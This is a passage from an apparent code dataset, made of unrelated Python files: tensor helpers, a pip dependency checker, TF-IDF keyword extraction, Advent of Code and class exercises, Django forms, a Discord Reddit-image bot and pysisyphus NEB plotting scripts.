for i in range(0, len(images), batch_size):\n yield images[i:i+batch_size]\n\ndef set_multiple_indices_to_zero(tensor, indices):\n # Get the batch size\n batch_size = tensor.shape[0]\n # Get the indices in 1D\n indices = indices[:,0]*tensor.shape[1]+indices[:,1] # calculate 1D indices\n # Create a mask of the same shape as the tensor\n mask = torch.ones_like(tensor)\n # reshape the mask to 1D\n mask = mask.reshape(-1)\n # set the corresponding element in the mask to 0\n mask[indices] = 0\n # reshape the mask back to 2D\n mask = mask.reshape(tensor.shape)\n # Apply the mask to the tensor\n tensor = tensor * mask\n return tensor\n\n","repo_name":"LucasFenaux/torch-gaggle","sub_path":"gaggle/utils/torch_helper.py","file_name":"torch_helper.py","file_ext":"py","file_size_in_byte":1348,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"43"} +{"seq_id":"23734556889","text":"import subprocess\nimport sys\ndef check_dependencies(path):\n requirements_path = path + '/requirements.txt'\n\n try:\n result = subprocess.run(\n ['pip', 'check', '-r', requirements_path],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE,\n check=True\n )\n\n print(\"Dependencies Version Up to Date.\")\n sys.exit(0)\n\n except subprocess.CalledProcessError as e:\n print(\"Dependencies Versions Outdated.\")\n print(e.stderr.decode())\n sys.exit(1)\n\nif __name__ == '__main__':\n path = \"/Users/bilgici/Desktop/vulnerablelab/\"\n check_dependencies(path)","repo_name":"MustafaBilgici/SucoshScanny","sub_path":"dependencycheck/python.py","file_name":"python.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"43"} +{"seq_id":"7882524165","text":"# [WIP]\r\nimport re\r\nimport os\r\nimport json\r\nimport glob\r\nimport glob2\r\nimport numpy as np\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom pathlib import Path\r\nfrom utils import (\r\n get_ner_content,\r\n get_raw_content,\r\n get_regex_content,\r\n get_sw_content,\r\n get_stop_words,\r\n get_stem_content,\r\n)\r\n\r\ndocs = []\r\nfile_path_list = glob2.glob(\"./data/*\")[:]\r\n\r\nfor file_path in file_path_list:\r\n print(f\"正在處理 {file_path}...\")\r\n name = os.path.basename(file_path)\r\n content = get_raw_content(file_path) # 原始內容\r\n content = get_regex_content(content) # 正則過濾\r\n content = get_sw_content(content) # 去除停用詞\r\n content = get_stem_content(content) # Porter Stemming\r\n content = get_ner_content(content) # NER過濾\r\n docs.append(content)\r\n\r\n# TF-IDF\r\nvectorizer = TfidfVectorizer(\r\n token_pattern=r\"(?u)\\b\\w+\\b\", norm=None, stop_words=get_stop_words()\r\n)\r\nX = vectorizer.fit_transform(docs)\r\nfeature_names = np.array(vectorizer.get_feature_names())\r\nsorted_indexes = X.toarray().argsort()\r\n# for idx, indexes in enumerate(sorted_indexes):\r\n# print(f\"==={file_path_list[idx]}===\")\r\n# print(feature_names[indexes][:50]) # tfidf前50小 (過濾掉)\r\n# print(feature_names[indexes][::-1][:50]) # tfidf前50大 (關鍵字)\r\n\r\noutput = {}\r\nfor idx, indexes in enumerate(sorted_indexes):\r\n key = os.path.basename(file_path_list[idx])\r\n print(feature_names[indexes][::-1][:50]) # tfidf前50大 (關鍵字)\r\n output[key] = feature_names[indexes][::-1][:50].tolist()\r\n\r\nwith open(\"tfidf_top50_each_doc.json\", \"w\") as f:\r\n f.write(json.dumps(output))\r\n","repo_name":"temp4git1234/temp_proj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19028536479","text":"#!/usr/bin/env python3\n\n\ndef steps_between_cross(cross_points, path1, path2):\n steps = {}\n for point in cross_points:\n\n index = 0\n for step in path1:\n index += 1\n if step == point:\n steps[point] = index\n break\n\n index = 0\n for step in path2:\n index += 1\n if step == point:\n steps[point] += index\n break\n\n return min([i for i in steps.values()])\n\n\ndef shortest_manhattan_distance(goal, points):\n distances = []\n\n x1, y1 = goal\n for point in points:\n x2, y2 = point\n distance = abs(x1 - x2) + abs(y1 - y2)\n distances.append((distance, point))\n\n return min([i[0] for i in distances])\n\n\ndef trace_path_coordinates(steps):\n path = []\n x, y = 0, 0\n\n for step in steps:\n direction = step[0]\n distance = int(step[1:])\n\n if direction == 'R':\n for _ in range(distance):\n x += 1\n path.append((x, y))\n elif direction == 'L':\n for _ in range(distance):\n x -= 1\n path.append((x, y))\n elif direction == 'U':\n for _ in range(distance):\n y += 1\n path.append((x, y))\n elif direction == 'D':\n for _ in range(distance):\n y -= 1\n path.append((x, y))\n else:\n break\n\n return path\n\n\nif __name__ == \"__main__\":\n my_input = []\n\n with open('input_3.txt') as f_object:\n for line in f_object:\n my_input.append(line)\n\n wire_1 = my_input[0].split(',')\n wire_2 = my_input[1].split(',')\n\n wire_path_1 = trace_path_coordinates(wire_1)\n wire_path_2 = trace_path_coordinates(wire_2)\n\n cross_points = set(wire_path_1) & set(wire_path_2)\n\n print(f'The shortest distance is: {shortest_manhattan_distance((0, 0), cross_points)}.')\n\n shortest_path_to_cross = steps_between_cross(cross_points, wire_path_1, wire_path_2)\n print(f'The shortest amount of steps to first cross is {shortest_path_to_cross}.')\n","repo_name":"MalcolmFFS/AdventOfCode","sub_path":"2019/advent_3.py","file_name":"advent_3.py","file_ext":"py","file_size_in_byte":2120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"8273886925","text":"#+======================================================================================+\r\n# |Author : Kolli Hrudhay\r\n# |Package : Library Books\r\n# |Module : readingFun.py\r\n# |Language : Python 3.7\r\n# |Description : This module when called by the Assignment_code.py module, \r\n# will return the command provided by the later module \r\n# (from the files inputPS6.txt,promptsPS6.txt files) in the \r\n# required and proper format (without extra spaces,symbols etc) \r\n# for the Assignment_code.py module to correctly identify \r\n# and execute the function.\r\n#\r\n#+======================================================================================+\r\n\r\n\r\n\r\ndef readingFun(func):\r\n ''' This function read values from the input provided by the Assignment_code.py module and return the command\r\n in the right/required format. \r\n ''' \r\n elements = []\r\n with open(func, 'r') as file1:\r\n for f1 in file1:\r\n if len(f1)>1:\r\n if ',' in f1:\r\n temp = f1.split(',')\r\n\r\n elif ':' in f1:\r\n temp = f1.split(':')\r\n\r\n else:\r\n temp=[f1]\r\n\r\n for i in range(len(temp)):\r\n temp[i] = temp[i].strip()\r\n \r\n elements.append(temp)\r\n\r\n return elements\r\n","repo_name":"k1hrudhay/Library-Books","sub_path":"readingFun.py","file_name":"readingFun.py","file_ext":"py","file_size_in_byte":1462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33708358782","text":"phones=[]\nclass Handphone:\n def __init__(self, version, brand, color):\n self.version = version\n self.brand = brand\n self.color = color\n def info(self):\n print(f\"Version: {self.version}\\nBrand: {self.brand}\\ncolor: {self.color}\")\n def register(self):\n phones.append(self)\nwhile True:\n forward = input(\"Enter a phone? (y/n) \")\n if forward == 'n':\n break\n elif forward =='y':\n phoneversion = input('Enter phone version: ')\n phonebrand = input('Enter phone brand: ')\n phonecolor = input('Enter phone color: ')\n\n handphone1 = Handphone(phoneversion, phonebrand, phonecolor)\n handphone1.register()\n\nfor phone in phones:\n phone.info()","repo_name":"graciella12/python","sub_path":"handphone.py","file_name":"handphone.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37581458406","text":"import numpy as np\nimport math\nimport datetime\nimport random\n\nx, y, z = [False] * 3\nprint(x, y, z)\n\nx = 5, 5\ny = 10, 10\n\nprint(math.dist(x, y))\n\nclass Test:\n\n def __init__(self):\n pass\n\nx = Test()\nx.score = 5\nprint(x.score)\ny = None\nprint(not y)\n\nt = datetime.datetime.now()\nx = 1\nfor i in range(100000):\n x += 1\nt2 = float(str(datetime.datetime.now() - t)[-9:])\nprint(t2)\n\nx = np.array([11.12345])\nprint(x.round(3))\nprint()\n\nclass Test:\n\n def __init__(self):\n self.x = 5\n self.y = 5\n\n def func1(self):\n self.x = 10\n\n def func2():\n self.y = 10\n return 10\n\n return 5\n\np = .1\nfor i in range(5):\n if random.random() < p:\n break\nelse:\n print('boop', i)\nprint('beep', i)\n\n\nx = [1,2,3,4,5,6,7,8]\nprint(random.choices(x, k=3))\nfor i, j in zip([[]], [[]]):\n pass\n\nx = tuple(\"5, 10, 20\")\nprint(x)","repo_name":"ColinBalfour/Pathfinding","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"19287018487","text":"car = input(\"What you want car?\")\n\nprint(\"Let me see if I can find you a Subaru \"+car)\n\npeople = input(\"How many people? \")\npeople = int(people)\nif people > 8:\n print(\"No desk\")\nelse:\n print(\"Please come in \")\n\nnumber = input(\"Please input a number:\")\nnumber = int(number)\n\nif number%10 == 0:\n print(\"数字 \"+str(number)+\" 是10的倍数\")\nelse:\n print(\"数字 \" + str(number) + \" 不是10的倍数\")","repo_name":"Katherine916/suye","sub_path":"seven/test71.py","file_name":"test71.py","file_ext":"py","file_size_in_byte":413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"18348891747","text":"from django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.contrib.auth import get_user_model\nfrom django import forms\n\n\nclass CustomUserCreationForm(UserCreationForm):\n username = forms.CharField(\n label='사용자 이름',\n widget=forms.TextInput(\n attrs={\n 'class': 'my-title',\n 'placeholder': 'Enter the title',\n 'maxlength': 10,\n }\n )\n )\n \n class Meta(UserCreationForm.Meta):\n model = get_user_model()\n fields = ('username', 'email', 'first_name', 'last_name')\n\n\n\nclass CustomUserChangeForm(UserChangeForm):\n class Meta(UserChangeForm.Meta):\n model = get_user_model()\n fields = ('email', 'first_name', 'last_name', 'username', 'password')","repo_name":"yujinni/Django-Practice","sub_path":"accounts/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"7434004244","text":"import numpy as np\nimport tensorflow\n\n\ndef saveInputMasks(imasks, mask_save_path, im_save_path, train):\n #imasks: list of input masks (each element of list of shape (512,512,3))\n #mask_save_path: path where you want to store array with all input masks in it\n #im_save_path: path where you want to store each input mask as image\n #train: generating for training data if \"True\", generating for testing data if \"False\"\n ##############################\n #create input placeholder list\n inp = []\n print(\"Serial no. of input image being saved:\")\n for i in range(len(imasks)):\n print(i)\n #save image form of input mask\n im_i = tensorflow.keras.preprocessing.image.array_to_img(imasks[i])\n im_i_path = im_save_path + str(i) + \".jpg\"\n tensorflow.keras.preprocessing.image.save_img(im_i_path,im_i)\n #save array form\n input_i = tensorflow.reshape(imasks[i],(1,512,512,3))\n inp.append(input_i.numpy())\n #save input image array\n if train == True:\n train_input = np.asarray(inp)\n np.save(mask_save_path+'train_inputs.npy',train_input)\n else:\n train_input = np.asarray(inp)\n np.save(mask_save_path+'test_inputs.npy',train_input)\n\n","repo_name":"Dzhuhnuhmeidzhai/FloorPlanResearcher","sub_path":"MasksGeneration/Scripts/saveInputMasks.py","file_name":"saveInputMasks.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"43"} +{"seq_id":"28976801987","text":"from discord.ext import tasks, commands\nfrom itertools import zip_longest\nfrom cogs.db_operations import db_rdt_cmd_data_get, db_get_conf_server_all, db_get_nsfw_channels, \\\n db_rdt_rand_content_get, db_rdt_sub_translt_get\nimport ffmpy\nimport os\nimport urllib.request as req\nfrom gfycat.client import GfycatClient\nimport discord\nimport random\nimport asyncio\nimport functools\nimport logging\nimport shortuuid\n\n# Retrieve logger\nlog = logging.getLogger(\"General_logs\")\n\n# Used to check if a command is NSFW decorator\nc_dict = {items[0]: items[1] for items in db_rdt_cmd_data_get()} # [dict] of commands (dict key is command)\n# Used to get the list of commands the the aliases system\nc_list = [items[0] for items in db_rdt_cmd_data_get()] # [list] of all commands\n# Used to get the list of sfw commands for the helper menu\nc_list_sfw = [items[0] for items in db_rdt_cmd_data_get() if items[1] == 0] # [list] of SFW commands\n# Used to get the list of nsfw commands for the helper menu\nc_list_nsfw = [items[0] for items in db_rdt_cmd_data_get() if items[1] == 1] # [list] of NSFW commands\n\nlog.info('[COGS] RedditScrap COG loaded')\n\n# FUNCTIONS ######################################################################################\n##################################################################################################\n\n\ndef create_gif(data):\n ff1 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 12 -loglevel quiet -vf scale=640:-1'})\n ff2 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 10 -loglevel quiet -vf scale=640:-1'})\n ff3 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 10 -loglevel quiet -vf scale=480:-1'})\n ff4 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 10 -loglevel quiet -vf scale=320:-1'})\n ff5 = ffmpy.FFmpeg(\n inputs={\"tempDL.mp4\": None},\n outputs={\"tempDiscord.gif\": '-y -r 8 -loglevel quiet -vf scale=320:-1'})\n\n if data[2] < 10: # If the gif is less than 10 seconds\n ff1.run()\n else: # If the gif is more than 10 seconds\n ff2.run()\n if os.path.getsize(\"tempDiscord.gif\") < 8000000:\n pass\n else:\n ff3.run()\n if os.path.getsize(\"tempDiscord.gif\") < 8000000:\n pass\n else:\n ff4.run()\n if os.path.getsize(\"tempDiscord.gif\") < 8000000:\n pass\n else:\n ff5.run()\n\n\ndef prepare_embed(content_url, content_type):\n # Generate UUID\n data_uid = shortuuid.uuid()\n\n #if isinstance(content_url, tuple):\n # log.debug('Prepare embed started / ' + content_url[1] + ' / GFYCAT') # DEBUG\n # req.urlretrieve(content_url[1], 'tempDL.mp4')\n # create_gif(content_url)\n # file = discord.File(os.path.join(os.getcwd(), \"tempDiscord.gif\"), filename='tempDiscord.gif')\n # embed = discord.Embed()\n # embed.set_image(url=\"attachment://tempDiscord.gif\")\n\n log.debug('Creating embed for url \"' + content_url + '\" of type \"' + content_type) # DEBUG\n file = None\n embed = discord.Embed()\n embed.set_image(url=content_url)\n return embed, file\n\n\n# DECORATORS #####################################################################################\n##################################################################################################\n\n# Decorator to check for NSFW commands\ndef nsfw_check():\n async def predicate(ctx):\n if c_dict.get(ctx.invoked_with) == 1: # Check if NSFW command\n if db_get_conf_server_all(ctx.guild.id)[0] == 0: # Checking current nsfw_mode (disabled)\n await ctx.channel.send(\"Ey non, pas ici petit coquin ! Ce discord n'est pas NSFW !\")\n elif db_get_conf_server_all(ctx.guild.id)[0] == 1: # Checking current nsfw_mode (semi-enabled)\n if ctx.channel.id in db_get_nsfw_channels(ctx.guild.id): # If channel is an authorized nsfw channel\n return True\n else:\n await ctx.channel.send(\"Ey non, pas ici petit coquin ! Réessaie dans un channel NSFW !\")\n elif db_get_conf_server_all(ctx.guild.id)[0] == 2: # Checking current nsfw_mode (enable)\n return True\n else:\n return True\n\n return commands.check(predicate)\n\n\n# Sanity-check decorator to see if everything config related to this cog is fine\ndef check_cog_redditscrap():\n async def predicate(ctx):\n conf_server_all = db_get_conf_server_all(ctx.guild.id)\n error_nbr = 0\n if conf_server_all is None:\n raise commands.UserInputError(\"Ce serveur n\\'est pas configuré pour utiliser cette commande !\")\n else:\n if not 0 <= conf_server_all[0] <= 2: # nsfw_mode\n error_nbr += 1\n if not 4 <= conf_server_all[1] <= 30: # short_reddit_timer\n error_nbr += 1\n if not 10 <= conf_server_all[2] <= 90: # long_reddit_timer\n error_nbr += 1\n\n if error_nbr == 0:\n return True\n else:\n await ctx.channel.send(\"Ce serveur n\\'est pas configuré pour utiliser cette commande.\\n\"\n \"Configurations erronées/manquantes : {}\"\n .format(error_nbr))\n\n return commands.check(predicate)\n\n\nclass RedditScrap(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n # CLASS FUNCTIONS ################################################################################\n ##################################################################################################\n\n async def check_react(self, ctx, embed, file, isheavy):\n await ctx.message.clear_reactions()\n\n # Change the timer depending if the content is heavy or not\n if isheavy is True:\n timer = db_get_conf_server_all(ctx.guild.id)[2] # Get server specific long-timer reddit value\n else:\n timer = db_get_conf_server_all(ctx.guild.id)[1] # Get server specific short-timer reddit value\n\n # Check if the embed will contain a file attachement or not\n if file is None:\n img = await ctx.channel.send(embed=embed)\n else:\n img = await ctx.channel.send(file=file, embed=embed)\n\n await img.add_reaction('\\N{WHITE HEAVY CHECK MARK}')\n await img.add_reaction('\\N{CROSS MARK}')\n\n def check(react, discord_user):\n return discord_user.bot is False and str(react.emoji) in ['\\N{WHITE HEAVY CHECK MARK}',\n '\\N{CROSS MARK}'] and react.message.id == img.id\n\n try:\n reaction, user = await self.bot.wait_for('reaction_add', timeout=timer, check=check)\n except asyncio.TimeoutError:\n await img.delete()\n await ctx.message.delete()\n else:\n\n if str(reaction.emoji) == '\\N{WHITE HEAVY CHECK MARK}':\n await img.clear_reactions()\n else:\n await img.delete()\n await ctx.message.delete()\n\n # COMMANDS #######################################################################################\n ##################################################################################################\n\n @check_cog_redditscrap()\n @nsfw_check()\n @commands.command(aliases=c_list[1:])\n async def sendmeme(self, ctx):\n log.debug('Processing started for command : ' + ctx.invoked_with) # DEBUG\n sub_tuple = tuple([items[0] for items in db_rdt_sub_translt_get(ctx.invoked_with)]) # Tuple of subs concerned by command\n log.debug('List of subs concerned by the command : ' + str(sub_tuple)) # DEBUG\n await ctx.message.add_reaction('\\N{HOURGLASS}')\n content_url, content_type = db_rdt_rand_content_get(sub_tuple)\n log.debug('Chosen content URL is : ' + content_url + ' of type ' + content_type) # DEBUG\n if content_type in ['gifv', 'gif']:\n isheavy = True\n else:\n isheavy = False\n embed, file = prepare_embed(content_url, content_type)\n await self.check_react(ctx, embed, file, isheavy)\n\n # !rhelp command for help\n @check_cog_redditscrap()\n @commands.command()\n async def rhelp(self, ctx):\n\n embed = discord.Embed(title=\"Bienvenue sur le merveilleux 🤖 des Blackstones !\",\n description=\"Je suis la pour vous aider 😄\", color=0xd5d500)\n\n embed.set_footer(\n text=\"Lorsque que vous demandez une image, le bot l'affichera pendant 14 secondes, puis elle \"\n \"disparaîtra. \\n \"\n \"Cliquer sur la réaction ✅ la laissera en permanent. \\n Cliquer sur la réaction â�Œ supprimera \"\n \"l'image \"\n \"directement. \")\n\n if db_get_conf_server_all(ctx.guild.id)[0] == 0: # Checking current nsfw_mode (disabled)\n for a, b in zip_longest(c_list_sfw[::2], c_list_sfw[1::2]): # List format to get 1/2 pairs\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='', inline=True)\n\n elif db_get_conf_server_all(ctx.guild.id)[0] == 1: # Checking current nsfw_mode (semi-enabled)\n if ctx.channel.id in db_get_nsfw_channels(ctx.guild.id): # If channel is an authorized nsfw channel\n for a, b in zip_longest(c_list_nsfw[::2], c_list_nsfw[1::2]): # # List format to get 1/2 pairs\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='.', inline=True)\n else:\n for a, b in zip_longest(c_list_sfw[::2], c_list_sfw[1::2]):\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='.', inline=True)\n\n elif db_get_conf_server_all(ctx.guild.id)[0] == 2: # Checking current nsfw_mode (enable)\n for a, b in zip_longest(c_list_nsfw[::2], c_list_nsfw[1::2]): # # List format to get 1/2 pairs\n if b is not None:\n embed.add_field(name=a, value=b, inline=True)\n else:\n embed.add_field(name=a, value='.', inline=True)\n\n await ctx.channel.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(RedditScrap(bot))\n\n# For the reddit_scrapping COG : ##\n# Improve Gif-conversion system to handle all cases and be flexible\n# Get the script async to avoid huge lagtime\n# Adds logs to know user statistics\n","repo_name":"Demokdawa/Blackstone-bot","sub_path":"cogs/reddit_bot.py","file_name":"reddit_bot.py","file_ext":"py","file_size_in_byte":10926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"21002848445","text":"#!/usr/bin/env python3\n\nimport argparse\nimport os\nfrom pathlib import Path\nimport sys\n\nimport h5py\nimport matplotlib\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib.patches import Rectangle\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom scipy.interpolate import splrep, splev\nimport yaml\n\nfrom pysisyphus.constants import AU2KJPERMOL, BOHR2ANG, AU2EV\nfrom pysisyphus.cos.NEB import NEB\nfrom pysisyphus.Geometry import Geometry\nfrom pysisyphus.peakdetect import peakdetect\nfrom pysisyphus.wrapper.jmol import render_cdd_cube\n\n\nCDD_PNG_FNS = \"cdd_png_fns\"\n\n\nclass Plotter:\n def __init__(self, coords, data, ylabel, interval=750, save=None,\n legend=None):\n self.coords = coords\n self.data = data\n self.ylabel = ylabel\n self.interval = interval\n self.save = save\n self.legend = legend\n\n # First image of the first cycle\n self.anchor = self.coords[0][0]\n self.cycles = len(self.data)\n self.pause = True\n\n self.fig, self.ax = plt.subplots()\n self.fig.canvas.mpl_connect('key_press_event', self.on_keypress)\n\n self.ax.set_xlabel(\"Path length / Bohr\")\n y_min = self.data.min()\n y_max = self.data.max()\n self.ax.set_ylim(y_min, y_max)\n self.ax.set_ylabel(self.ylabel)\n\n self.coord_diffs = self.get_coord_diffs(self.coords)\n\n if self.data.ndim == 2:\n self.update_func = self.update_plot\n elif self.data.ndim == 3:\n self.update_func = self.update_plot2\n\n def get_coord_diffs(self, coords, normalize=False):\n coord_diffs = list()\n for per_cycle in coords:\n tmp_list = [0, ]\n for i in range(len(per_cycle)-1):\n diff = np.linalg.norm(per_cycle[i+1]-per_cycle[i])\n tmp_list.append(diff)\n tmp_list = np.cumsum(tmp_list)\n offset = np.linalg.norm(self.anchor-per_cycle[0])\n tmp_list += offset\n if normalize:\n tmp_list /= tmp_list.max()\n coord_diffs.append(tmp_list)\n return np.array(coord_diffs)\n\n def update_plot(self, i):\n \"\"\"Use this when only 1 state is present.\"\"\"\n self.fig.suptitle(\"Cycle {}\".format(i))\n self.lines[0].set_xdata(self.coord_diffs[i])\n self.lines[0].set_ydata(self.data[i])\n if self.save:\n self.save_png(i)\n\n def update_plot2(self, i):\n \"\"\"Use this when several states are present.\"\"\"\n self.fig.suptitle(\"Cycle {}\".format(i))\n for j, line in enumerate(self.lines):\n line.set_ydata(self.data[i][:, j])\n if self.save:\n self.save_png(i)\n\n def save_png(self, frame):\n frame_fn = f\"step{frame}.png\"\n if not os.path.exists(frame_fn):\n self.fig.savefig(frame_fn)\n\n def animate(self):\n self.lines = self.ax.plot(self.coord_diffs[0], self.data[0], \"o-\")\n if self.legend:\n self.ax.legend(self.lines, self.legend)\n self.animation = FuncAnimation(\n self.fig,\n self.update_func,\n frames=self.cycles,\n interval=self.interval\n )\n if self.save:\n self.animation.save(\"animation.gif\", writer='imagemagick', fps=5)\n plt.show()\n\n def on_keypress(self, event):\n \"\"\"Pause on SPACE press.\"\"\"\n #https://stackoverflow.com/questions/41557578\n if event.key == \" \":\n if self.pause:\n self.animation.event_source.stop()\n else:\n self.animation.event_source.start()\n self.pause = not self.pause\n\n\ndef plot_energies():\n keys = (\"energy\", \"cart_coords\")\n (energies, coords), num_cycles, num_images = load_results(keys)\n\n if isinstance(num_images, list):\n print(\"Please use --aneb instead of --energies\")\n return\n\n lengths = np.array([len(e) for e in energies])\n equal_lengths = lengths == lengths[-1]\n # Hack to support growing string calculations\n energies = np.array([e for e, l in zip(energies, equal_lengths) if l])\n coords = np.array([c for c, l in zip(coords, equal_lengths) if l])\n num_cycles, num_images = energies.shape\n\n energies -= energies.min()\n energies *= AU2KJPERMOL\n\n # Static plot of path with equally spaced images\n fig, ax = plt.subplots()\n colors = matplotlib.cm.Greys(np.linspace(.2, 1, num=num_cycles))\n for cycle, color in zip(energies, colors):\n ax.plot(cycle, \"o-\", color=color)\n ax.set_title(\"Energies\")\n\n kwargs = {\n \"ls\": \":\",\n \"color\": \"darkgrey\",\n }\n try:\n last_cycle = energies[-1]\n spl = splrep(np.arange(num_images), last_cycle)\n # Calculate interpolated values\n x2 = np.linspace(0, num_images, 100)\n y2 = splev(x2, spl)\n # Only consider maxima\n peak_inds, _ = peakdetect(y2, lookahead=2)\n if not peak_inds:\n ax.plot(x2, y2)\n else:\n peak_inds = np.array(peak_inds)[:, 0].astype(int)\n peak_xs = x2[peak_inds]\n peak_ys = y2[peak_inds]\n ax.plot(x2, y2, peak_xs, peak_ys, \"x\")\n for px, py in zip(peak_xs, peak_ys):\n ax.axhline(y=py, **kwargs)\n line = matplotlib.lines.Line2D([px, px], [0, py], **kwargs)\n ax.add_line(line)\n except TypeError:\n print(\"Not enough images for splining!\")\n\n # Always draw a line at the minimum y=0\n ax.axhline(y=0, **kwargs)\n ax.set_xlabel(\"Image\")\n ax.set_ylabel(\"dE / kJ mol⁻¹\")\n\n fig2, ax2 = plt.subplots()\n last_energies = energies[-1].copy()\n xs = np.arange(len(last_energies))\n ax2.plot(xs, last_energies, \"o-\")\n ax2.set_xlabel(\"Image\")\n ax2.set_ylabel(\"$\\Delta$E / kJ mol⁻¹\")\n ax2.set_title(f\"Cycle {len(energies)-1}\")\n\n first_image_en = last_energies[0]\n last_image_en = last_energies[-1]\n max_en_ind = last_energies.argmax()\n max_en = last_energies[max_en_ind]\n print( \"Barrier heights using actual energies (not splined) from \"\n f\"cycle {energies.shape[0]-1}.\")\n print(f\"\\tHighest energy image (HEI) at index {max_en_ind} (0-based)\")\n\n first_barr = max_en - first_image_en\n print(f\"\\tBarrier between first image and HEI: {first_barr:.1f} kJ mol⁻¹\")\n last_barr = max_en - last_image_en\n print(f\"\\tBarrier between last image and HEI: {last_barr:.1f} kJ mol⁻¹\")\n\n # Also do an animation\n plotter = Plotter(coords, energies, \"ΔE / au\", interval=250, save=False)\n # This calls plt.show()\n plotter.animate()\n\n\ndef plot_aneb():\n keys = (\"energy\", \"cart_coords\")\n (energies, coords), num_cycles, num_images = load_results(keys)\n\n # Use coordinates of the first image in the first cycle as\n # anchor for all following cycles.\n first_coords = coords[0][0]\n\n coord_diffs = list()\n min_ = 0\n max_ = max(energies[0])\n for en, c in zip(energies, coords):\n cd = np.linalg.norm(c - first_coords, axis=1)\n min_ = min(min_, min(en))\n max_ = max(max_, max(en))\n coord_diffs.append(cd)\n\n energies_ = list()\n au2kJmol = 2625.499638\n for en in energies:\n en = np.array(en)\n en -= min_\n en *= au2kJmol\n energies_.append(en)\n\n fig, ax = plt.subplots()\n # Initial energies\n lines = ax.plot(coord_diffs[0], energies_[0], \"o-\")\n y_max = (max_ - min_) * au2kJmol\n ax.set_ylim(0, y_max)\n\n ax.set_xlabel(\"Coordinate differences / Bohr\")\n ax.set_ylabel(\"$\\Delta$J / kJ $\\cdot$ mol$^{-1}$\")\n\n def update_func(i):\n fig.suptitle(\"Cycle {}\".format(i))\n lines[0].set_xdata(coord_diffs[i])\n lines[0].set_ydata(energies_[i])\n\n def animate():\n animation = FuncAnimation(\n fig,\n update_func,\n frames=num_cycles,\n interval=250,\n )\n return animation\n anim = animate()\n plt.show()\n\n\ndef load_results(keys):\n if isinstance(keys, str):\n keys = (keys, )\n image_results_fn = \"image_results.yaml\"\n print(f\"Reading {image_results_fn}\")\n with open(image_results_fn) as handle:\n all_results = yaml.load(handle.read(), Loader=yaml.Loader)\n num_cycles = len(all_results)\n\n results_list = list()\n for key in keys:\n tmp_list = list()\n for res_per_cycle in all_results:\n try:\n tmp_list.append([res[key] for res in res_per_cycle])\n except KeyError:\n print(f\"Key '{key}' not present in {image_results_fn}. Exiting.\")\n sys.exit()\n results_list.append(np.array(tmp_list))\n # The length of the second axis correpsonds to the number of images\n # Determine the number of images. If we have the same number of images\n # set num_images to this number. Otherwise return a list containing\n # the number of images.\n num_images = np.array([len(cycle) for cycle in results_list[0]])\n if all(num_images[0] == num_images):\n num_images = num_images[0]\n print(f\"Found path with {num_images} images.\")\n # Flatten the first axis when we got only a single key\n if len(results_list) == 1:\n results_list = results_list[0]\n print(f\"Loaded {num_cycles} cycle(s).\")\n return results_list, num_cycles, num_images\n\n\ndef plot_cosgrad():\n keys = (\"energy\", \"forces\", \"coords\")\n (energies, forces, coords), num_cycles, num_images = load_results(keys)\n atom_num = coords[0][0].size // 3\n dummy_atoms =[\"H\"] * atom_num\n\n all_nebs = list()\n all_perp_forces = list()\n for i, per_cycle in enumerate(zip(energies, forces, coords), 1):\n ens, frcs, crds = per_cycle\n images = [Geometry(dummy_atoms, per_image) for per_image in crds]\n for image, en, frc in zip(images, ens, frcs):\n image._energy = en\n image._forces = frc\n\n neb = NEB(images)\n all_nebs.append(neb)\n pf = neb.perpendicular_forces.reshape(num_images, -1)\n all_perp_forces.append(pf)\n\n # Calculate norms of true force\n # Shape (cycles, images, coords)\n force_norms = np.linalg.norm(forces, axis=2)\n all_max_forces = list()\n all_rms_forces = list()\n rms = lambda arr: np.sqrt(np.mean(np.square(arr)))\n for pf in all_perp_forces:\n max_forces = pf.max(axis=1)\n all_max_forces.append(max_forces)\n rms_forces = np.apply_along_axis(rms, 1, pf)\n all_rms_forces.append(rms_forces)\n all_max_forces = np.array(all_max_forces)\n all_rms_forces = np.array(all_rms_forces)\n\n fig, (ax0, ax1, 